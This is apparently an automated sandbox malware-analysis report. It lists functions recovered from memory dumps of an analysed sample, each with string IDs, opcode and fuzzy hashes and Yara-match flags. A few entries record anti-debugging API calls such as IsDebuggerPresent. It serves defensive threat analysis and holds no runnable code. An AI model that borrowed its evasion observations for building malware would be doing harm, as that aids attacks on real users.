                          Function 0110544C, Relevance: 6.5, Strings: 5, Instructions: 245COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ;o$S\K$lS$}xV$&Q
                          • API String ID: 0-2347710372
                          • Opcode ID: 513618c648cbec0d9677a6dfe16293e40a890dc85db84fa25b395aea101606cb
                          • Instruction ID: 80e5678a1e1b5906e9c9c710ae167351b697bee07ca4dc5244e2b0e0565fc41c
                          • Opcode Fuzzy Hash: 513618c648cbec0d9677a6dfe16293e40a890dc85db84fa25b395aea101606cb
                          • Instruction Fuzzy Hash: 73C120715093809FD3A9CF66C54A91BFBF2FBD5B48F50891CF6A586260C3B28949CF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 011128D5, Relevance: 6.5, Strings: 5, Instructions: 228COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: '$b9$zw$@$i
                          • API String ID: 0-3000951012
                          • Opcode ID: 1f1a8b94e9da8684bdd888ea758926e21fc1f47c4b7e31def880db3639523ad0
                          • Instruction ID: 9d6c0e359486833f8d0d243457de4145aef6d85f8611168285f02610631ffca7
                          • Opcode Fuzzy Hash: 1f1a8b94e9da8684bdd888ea758926e21fc1f47c4b7e31def880db3639523ad0
                          • Instruction Fuzzy Hash: 6EA134715093019FD319CF6AC94964FFBE2EBC5B58F04892DF2959A264C3B5C90ACF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 011152D1, Relevance: 6.5, Strings: 5, Instructions: 201COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ,Z$,Z$Do$oHg$}bH
                          • API String ID: 0-2022688335
                          • Opcode ID: 843445b05ab48e06b3a5222582a9859293c04a3f71059befc1ef7018e5af6570
                          • Instruction ID: e009644b79d0f4745b7a95ff3f121f7138b3e4dcfe8c05e3aadc54bd51561cd0
                          • Opcode Fuzzy Hash: 843445b05ab48e06b3a5222582a9859293c04a3f71059befc1ef7018e5af6570
                          • Instruction Fuzzy Hash: 188166716083009BD798DE25D48941FFBF2FBD5798F008A2DF69696264C7B28949CF83
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01108D80, Relevance: 6.4, Strings: 5, Instructions: 147COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: +Jn?$1p$HkRx$JW$oRz
                          • API String ID: 0-927109725
                          • Opcode ID: bb9536aece9e32f2eccfd63cf9bf880a6af89a960e99303e0f8a3f1e8bb5b8d7
                          • Instruction ID: 63abb41871319928bdbca8edf5703a1e633af9f18c4000cd6ecddfaa23f695b4
                          • Opcode Fuzzy Hash: bb9536aece9e32f2eccfd63cf9bf880a6af89a960e99303e0f8a3f1e8bb5b8d7
                          • Instruction Fuzzy Hash: 646134729083029FC359CE25C48945BBBF2FBC4368F448A1DF595662A0D3B49A4A8F83
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECEAB0C, Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                          Download Yara Rule
                          APIs
                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6ECEAB18
                          • IsDebuggerPresent.KERNEL32 ref: 6ECEABE4
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6ECEAC04
                          • UnhandledExceptionFilter.KERNEL32(?), ref: 6ECEAC0E
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                          • String ID:
                          • API String ID: 254469556-0
                          • Opcode ID: 308ebb3e5d79f4b450c791375f22a361e9d408bba3502d2aa61141db9ad58343
                          • Instruction ID: a1d223b398793dcb93bb89a6a2d3e1546bef8ad3a897de42b553315e05fd6e17
                          • Opcode Fuzzy Hash: 308ebb3e5d79f4b450c791375f22a361e9d408bba3502d2aa61141db9ad58343
                          • Instruction Fuzzy Hash: C53129B6D05218DFDF50DFA4D989BCCBBB8AF08304F1044AAE40DAB240EB755A84CF54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0110EE60, Relevance: 5.4, Strings: 4, Instructions: 354COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: #,BW$,)$Iv5$TaF_
                          • API String ID: 0-3950248132
                          • Opcode ID: 582d042adcbd265781dbbc03c50982e005030cc4448df94170a0c9d456557ea4
                          • Instruction ID: f6d9fcf8c285a5777489f896423f210b3c10d917475553a5ead90fffc9a810bd
                          • Opcode Fuzzy Hash: 582d042adcbd265781dbbc03c50982e005030cc4448df94170a0c9d456557ea4
                          • Instruction Fuzzy Hash: 4F025072C0031D9BCF29CFA5D88A5DEBBB1FB44318F208159E116BA260D7B44A8ACF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01106453, Relevance: 5.2, Strings: 4, Instructions: 220COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: JS$Q+L$_+M$k%|
                          • API String ID: 0-1651988620
                          • Opcode ID: ceb267fd2ebd44106289bfd2a23178b3059612b5fc88a7ea45f8895f0ce870ac
                          • Instruction ID: c5c09fd870d4edc963d96344269e466c26dd5c9cdeb779d2f6e7fd78898f9fd7
                          • Opcode Fuzzy Hash: ceb267fd2ebd44106289bfd2a23178b3059612b5fc88a7ea45f8895f0ce870ac
                          • Instruction Fuzzy Hash: F8A110B15083819FC359CF66C48981BFFE2FB94758F108A1DF29696260E3B58A59CF43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01102CC2, Relevance: 5.2, Strings: 4, Instructions: 219COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: !y$Zc5$5v$xe
                          • API String ID: 0-3224497632
                          • Opcode ID: b09f5cd0d864857308b96e52e71b07b7ab590047c35713b6a52464874615d622
                          • Instruction ID: dbac72162f7d01655e42251bc33544b0d8ff91c05cb122e44f750d83e769556b
                          • Opcode Fuzzy Hash: b09f5cd0d864857308b96e52e71b07b7ab590047c35713b6a52464874615d622
                          • Instruction Fuzzy Hash: BDA12E759093819FC359CF29D48981BFBE0BBC4798F004A2CFAA597260D7B5D949CF82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01113D0C, Relevance: 5.2, Strings: 4, Instructions: 212COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: FPTh$Z{{$[ob>$e(
                          • API String ID: 0-1695153795
                          • Opcode ID: 9a3f25559c9d3096c455dd09646fbb28e3b2621e9cbdb0653211a31344cb03c3
                          • Instruction ID: b870be40d285de34d9fd05e92cc176fad8ffa83d989b54da7bf6f98b3f47857f
                          • Opcode Fuzzy Hash: 9a3f25559c9d3096c455dd09646fbb28e3b2621e9cbdb0653211a31344cb03c3
                          • Instruction Fuzzy Hash: 6FA134B18183429BC758CF29C58945FFBE0BBC4758F404A2DF999A7264D3B1DA098F83
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0110BD61, Relevance: 5.2, Strings: 4, Instructions: 195COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: &J$M0}M$t$n
                          • API String ID: 0-2598164408
                          • Opcode ID: 93112c13898719dcb0fa725f487b000004003678a4712dd1a04254958555576a
                          • Instruction ID: b097f48081a4a175fae9097d450a72c13300915b5eabe6220fe42793289b5720
                          • Opcode Fuzzy Hash: 93112c13898719dcb0fa725f487b000004003678a4712dd1a04254958555576a
                          • Instruction Fuzzy Hash: 219132715083809BD359CE65C589A0BFBF1FBD9758F408A1DF69686260C3B6C948CF83
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 011043BE, Relevance: 5.2, Strings: 4, Instructions: 180COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ,?Z$,P$x&z$z\
                          • API String ID: 0-1410888773
                          • Opcode ID: 17635d5d9c2ea99e6c8d47affebd6329b62548ec35397c7043d11d3fed521b3e
                          • Instruction ID: 2373e4e823f1e8c393cea7b921304ee9f6eeb533b88dd0db6a999f5045ded78b
                          • Opcode Fuzzy Hash: 17635d5d9c2ea99e6c8d47affebd6329b62548ec35397c7043d11d3fed521b3e
                          • Instruction Fuzzy Hash: 517164719083419FD759CF29C88941BFBE2BBC4348F50492DF686966A0E7B1CA498F83
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0110A083, Relevance: 5.1, Strings: 4, Instructions: 149COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 8i$UZ$aK$wN
                          • API String ID: 0-333574292
                          • Opcode ID: a6a0b24c383be7939de8cb5fa0a7f320f0c154413070ca55bcd0e1767f045125
                          • Instruction ID: e74eb7013a027093122ce4227d3d0ab60eb6ef78035d485b442660654bb179a1
                          • Opcode Fuzzy Hash: a6a0b24c383be7939de8cb5fa0a7f320f0c154413070ca55bcd0e1767f045125
                          • Instruction Fuzzy Hash: D25197715083419FD349CE29E48841FBBE2FFC8758F504A2DF696972A0D3B5CA098B87
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0111E3B5, Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Ev$uj$w0$!
                          • API String ID: 0-1708426219
                          • Opcode ID: d693e092773c439b7d4fbc4671baed505a51b137da939974c5cce984d750a302
                          • Instruction ID: b4bb54b216629ef3189dda87909cfc34918eaa67f28cd9025976103d576dfaae
                          • Opcode Fuzzy Hash: d693e092773c439b7d4fbc4671baed505a51b137da939974c5cce984d750a302
                          • Instruction Fuzzy Hash: 7C514271D0021AABDF49DFE5C80A8DEFBB2FF58304F108059D911B6260E7B55A45CF94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0111DB87, Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: !_$N6\$R|h7$W+(
                          • API String ID: 0-592429890
                          • Opcode ID: eb2469aea0adbea0481d6745d23746dea2ee172cc36ccda2920d0026530ed09d
                          • Instruction ID: 8e57010ee3ebc0d7a86e96f699f2dd443515d527f99ced1730f13a498717e7e2
                          • Opcode Fuzzy Hash: eb2469aea0adbea0481d6745d23746dea2ee172cc36ccda2920d0026530ed09d
                          • Instruction Fuzzy Hash: 7F510D71D0121DEBCB08DFA1D98A8EEFBB2FB48304F208059E411BA264D7B55A55CF94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECF0326, Relevance: 4.6, APIs: 3, Instructions: 77COMMON
                          Download Yara Rule
                          APIs
                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6ECF041E
                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6ECF0428
                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6ECF0435
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                          • String ID:
                          • API String ID: 3906539128-0
                          • Opcode ID: d1bbf23c129acb97380bab3510edaff8baf103dad81934cdba10f6375c11a641
                          • Instruction ID: 3771477f25eb8edbfa88fad1759a3d9201246acec2134fd7cd241d0ab4d0673f
                          • Opcode Fuzzy Hash: d1bbf23c129acb97380bab3510edaff8baf103dad81934cdba10f6375c11a641
                          • Instruction Fuzzy Hash: DC31B075901228ABCB61DF64D989BDCBBB8BF08710F5045EAE81CA6250EB709F858F54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECD9F10, Relevance: 4.0, Strings: 3, Instructions: 233COMMON
                          Download Yara Rule
                          Strings
                          • <>()C,, xrefs: 6ECD9FAD
                          • {recursion limit reached}{invalid syntax}, xrefs: 6ECDA182
                          • ?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6ECD9F76
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: <>()C,$?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "${recursion limit reached}{invalid syntax}
                          • API String ID: 0-2241449410
                          • Opcode ID: 15d23c05417f867599d618d13ec7b596f2dc9c7465d04de9eb920724835ed797
                          • Instruction ID: 61026e77f6c9e5407d4b04e4213505ed4efb297f237c55b1531436dae6de3b3c
                          • Opcode Fuzzy Hash: 15d23c05417f867599d618d13ec7b596f2dc9c7465d04de9eb920724835ed797
                          • Instruction Fuzzy Hash: D781D4757087028FE724CFA5C4A0796B7E2AFC5310F04892DE69A8B659F776E44EC702
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 011185B8, Relevance: 4.0, Strings: 3, Instructions: 224COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: uQY$uQY$|&P-
                          • API String ID: 0-2022688025
                          • Opcode ID: d454276b7f4bce82ea83c23b944431f9674bb30cb44ed058e2424552851bd86e
                          • Instruction ID: e00e02b9e67a66c9097201e5173641e5957a41a03e587360ec7d2b7ec22f4c27
                          • Opcode Fuzzy Hash: d454276b7f4bce82ea83c23b944431f9674bb30cb44ed058e2424552851bd86e
                          • Instruction Fuzzy Hash: 29A121719083419FD758CF29D48940BFBE2FBC5758F008A2DF595AA260E7B1D94A8F82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01119124, Relevance: 4.0, Strings: 3, Instructions: 200COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: H9${FQ$~\
                          • API String ID: 0-4294077001
                          • Opcode ID: 6dc99ee14886c765de8187c205a84e16219ca8db519214540246810d04901235
                          • Instruction ID: 5d5e450c11352c57594ea40c8223d5c4a9ec1a4d80201b9b0675bb4aee062d03
                          • Opcode Fuzzy Hash: 6dc99ee14886c765de8187c205a84e16219ca8db519214540246810d04901235
                          • Instruction Fuzzy Hash: 5EB1EC7240038C9BDF59DFA1D98A8CE3BB1FB44388F508119FD2A96260C7B5D999CF80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0110CB13, Relevance: 3.9, Strings: 3, Instructions: 181COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: CP$F~c$|t3
                          • API String ID: 0-82454184
                          • Opcode ID: b04b25bbecc1f259a4fc2fde3581c27bdc2d4569c3b966c7e3772340f07d2b4f
                          • Instruction ID: a6790d3c9dc9992ff3548973a1346fefeb7a3bdd98f5f6bfc42b69b4a77cc2a8
                          • Opcode Fuzzy Hash: b04b25bbecc1f259a4fc2fde3581c27bdc2d4569c3b966c7e3772340f07d2b4f
                          • Instruction Fuzzy Hash: 36813271D0020AEBCF58CFA9D98A5EEFFB5FF44314F208159E512B62A0D3B44A459F94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01110BA4, Relevance: 3.9, Strings: 3, Instructions: 159COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: (B$S&$~
                          • API String ID: 0-116492414
                          • Opcode ID: 26746bb7a51525a6e6b45d6698d9aacd379f953159f35882a3bd0a96d12f38f3
                          • Instruction ID: 2c2cf05271be6b97806df4f5c82ed664c33d2984b088600a287466ee0f17aea3
                          • Opcode Fuzzy Hash: 26746bb7a51525a6e6b45d6698d9aacd379f953159f35882a3bd0a96d12f38f3
                          • Instruction Fuzzy Hash: 02713271809341AFC758CF65C98941FFBE1FB89B58F104A1DF69696220D3B1CA498F83
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0111BF0C, Relevance: 3.9, Strings: 3, Instructions: 155COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: *1W$+[$m&E>
                          • API String ID: 0-1836634314
                          • Opcode ID: 5d307d5265a8bb5fd653aea6e03193f8490273ce342be3d28951486de4e30dec
                          • Instruction ID: 3f1b501aadc37d604bd101f62553e20561841f604eaf4206498cbe06465749e2
                          • Opcode Fuzzy Hash: 5d307d5265a8bb5fd653aea6e03193f8490273ce342be3d28951486de4e30dec
                          • Instruction Fuzzy Hash: 9B712F711083819BC758CF60D98A91BFBF1FBC4758F104A1DF58296260D7B9DA498B83
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 011090D4, Relevance: 3.9, Strings: 3, Instructions: 128COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 13>$?_A$Jk|
                          • API String ID: 0-3522153091
                          • Opcode ID: 9f7db7fd69f16722ed54bbb1faa115af283d7ab3a07288f3dd77a07395533225
                          • Instruction ID: 1bde3b62748cc06930936384538954091194483dc8252776dc3fdace8c8f89e1
                          • Opcode Fuzzy Hash: 9f7db7fd69f16722ed54bbb1faa115af283d7ab3a07288f3dd77a07395533225
                          • Instruction Fuzzy Hash: DB511571C0121EABDF09CFE5D5469EEFBB1FB44318F208159D415BA250D3B85A05CF94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0111E10A, Relevance: 3.9, Strings: 3, Instructions: 112COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: D^$vq$%
                          • API String ID: 0-2873858206
                          • Opcode ID: 54c4ce59a686b5dd3bf9a7e3ef94cf9caef809456948d77d4bf3fce0830084f2
                          • Instruction ID: d4048f626815f6d56f819c9491e135c8da18860863405e418217be8798e713a0
                          • Opcode Fuzzy Hash: 54c4ce59a686b5dd3bf9a7e3ef94cf9caef809456948d77d4bf3fce0830084f2
                          • Instruction Fuzzy Hash: 8B41957150C3028FC719DE65C49942BFBE0FBC8758F100A2DF986A6264D771CA488F87
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0110F48A, Relevance: 3.9, Strings: 3, Instructions: 105COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: )o$HzL$hsn
                          • API String ID: 0-543950899
                          • Opcode ID: 143d3884d5ae298a24ff13d8d7f865c4b77dc7df5fcf487677fbae11b3d6bed3
                          • Instruction ID: 56da8dbf539734f0950edec78f985e6b872f2104474ee01478f3473b5a175b8f
                          • Opcode Fuzzy Hash: 143d3884d5ae298a24ff13d8d7f865c4b77dc7df5fcf487677fbae11b3d6bed3
                          • Instruction Fuzzy Hash: 0C417C719083428BC72DCE25D44A52FFBE1EBC4748F140A2DF596562A0D3B5CA4E8F87
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0111E899, Relevance: 3.8, Strings: 3, Instructions: 88COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: )$H`f$^s\A
                          • API String ID: 0-2557149085
                          • Opcode ID: b10851f5ff62cb8970c47835fd07839b934c7fb626b2a7cf67d0b20d897d4c34
                          • Instruction ID: d60d5e4b6273d7ce87581ac096a79b58d49e066a8f18250f198d028a32c84dc2
                          • Opcode Fuzzy Hash: b10851f5ff62cb8970c47835fd07839b934c7fb626b2a7cf67d0b20d897d4c34
                          • Instruction Fuzzy Hash: AE3157726093048FC758CF2AC88144BFBE1FBD8718F048A2DF98993254E771DA098F46
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0110CE5A, Relevance: 3.8, Strings: 3, Instructions: 69COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 0mZ$5-\$t2
                          • API String ID: 0-2873251415
                          • Opcode ID: 37070c9cf26442f8ea0e86b1f7c3f5d7b53a1400e48d463895da02277b411f90
                          • Instruction ID: 7d723107e054cd202192491152dbd3836f37c7ce8e6241752f243a2cbf8d018d
                          • Opcode Fuzzy Hash: 37070c9cf26442f8ea0e86b1f7c3f5d7b53a1400e48d463895da02277b411f90
                          • Instruction Fuzzy Hash: 6B31017190120AEBCF49CFA5DA0A89EBBB5FF44314F108549E92562260D3B19B24DFA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0111DDA5, Relevance: 3.8, Strings: 3, Instructions: 58COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: A>#$mK]$zh
                          • API String ID: 0-608348618
                          • Opcode ID: 103dee2b336bf25f8507ba83b0e833d55c82a63d957243bf54ec1509db9afec3
                          • Instruction ID: ad3caf652b3eae2ba99d03918c77641a8310d251c2b41bd2929f6b674c828bac
                          • Opcode Fuzzy Hash: 103dee2b336bf25f8507ba83b0e833d55c82a63d957243bf54ec1509db9afec3
                          • Instruction Fuzzy Hash: C621F2B6E0021EEBDF08DFE5C84A5AEBBB1FB50318F208599D514BA250D7B41B18DF80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECE0380, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 732COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Heap$AllocProcess
                          • String ID: <unknown>
                          • API String ID: 1617791916-1574992787
                          • Opcode ID: 3ddfada0eab63f7612b36cc081714bf68c49dbf196ce0db425e24909d5a3ec65
                          • Instruction ID: 63eb17faee42f9453ec468ad589173284df10fced5c94d27deebe19b7405d017
                          • Opcode Fuzzy Hash: 3ddfada0eab63f7612b36cc081714bf68c49dbf196ce0db425e24909d5a3ec65
                          • Instruction Fuzzy Hash: BF62C931E042698FDB15CFE8C8927DDBBB2BB49304F1881A9D859B7646FB305985CF81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECD1DE0, Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: ?${invalid syntax}
                          • API String ID: 0-3691751180
                          • Opcode ID: 9ae44dcaaafa6e59fa2efd7ee6ab0164ceb68ec0a6bd665d2411d781140fa234
                          • Instruction ID: 0353e38cb643e93bd4b0d54f80b9ceda3b97b9b4718f8d3e6c54a6743a0d94d3
                          • Opcode Fuzzy Hash: 9ae44dcaaafa6e59fa2efd7ee6ab0164ceb68ec0a6bd665d2411d781140fa234
                          • Instruction Fuzzy Hash: 6EB115316183168FD7098EADC4A056AB7A2BF86340F04C71EFAA957255E733DD4EC781
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01101EFB, Relevance: 2.8, Strings: 2, Instructions: 260COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: L&^$wg
                          • API String ID: 0-3816254650
                          • Opcode ID: 8942c06c5ef4b08e309cc84c0563722f89f237237c51a3126a9586ff7126d67f
                          • Instruction ID: 39d1a1010a6e74d3556420eee7be4a294fb48e4b7f77969903743de3f26d40a4
                          • Opcode Fuzzy Hash: 8942c06c5ef4b08e309cc84c0563722f89f237237c51a3126a9586ff7126d67f
                          • Instruction Fuzzy Hash: 5BD10E725083809FD369CF65C489A4BFBE2FBC5358F108A1DF1AA96260D7B58949CF43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECD68B0, Relevance: 2.8, Strings: 2, Instructions: 252COMMON
                          Download Yara Rule
                          Strings
                          • ?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6ECD68C9
                          • {invalid syntax}, xrefs: 6ECD6B4D
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
